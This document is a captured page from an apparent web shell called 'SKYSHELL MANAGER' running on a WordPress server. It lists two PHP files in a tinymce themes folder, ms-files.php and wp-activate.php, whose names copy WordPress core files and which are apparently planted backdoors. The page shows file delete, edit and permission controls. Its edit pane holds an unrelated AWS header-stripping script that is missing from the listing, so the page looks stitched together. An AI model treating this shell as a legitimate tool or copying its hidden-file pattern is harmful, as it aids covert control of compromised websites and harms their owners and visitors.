📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: gen_api.php
<?php $source = "php://stdin"; if (isset($argv[1])) { $source = $argv[1]; } $input_lines = file($source); foreach ($input_lines as $line) { // Strip AWS_EXTERN_C_BEGIN/END if (preg_match('/AWS_EXTERN_C/', $line)) { continue; } // Strip macros/includes if (preg_match('/^#/', $line)) { continue; } // Strip visibility attributes $line = str_replace('AWS_CRT_API ', '', $line); echo($line); }
Save